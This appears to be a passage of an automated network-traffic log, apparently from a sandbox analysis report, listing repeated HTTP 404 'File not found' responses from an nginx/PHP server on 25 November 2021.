        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:08 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:08 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:09 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:10 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:11 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:11 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:12 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:13 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:14 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:14 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:15 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:16 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:16 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:17 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:18 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:18 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:19 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:20 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:20 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:21 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:22 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:22 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:23 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:24 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:24 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:25 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:26 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:26 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:27 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:27 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:28 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:29 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:29 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:30 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:30 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:31 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:32 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:32 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:33 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:34 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:34 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:35 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:35 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:36 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:37 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:37 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:38 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:38 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:39 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:39 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:40 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:41 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:41 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:42 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:42 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:43 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:43 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:44 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:45 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:45 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:46 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:46 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:47 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:47 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:48 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:49 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:49 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:48:50 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
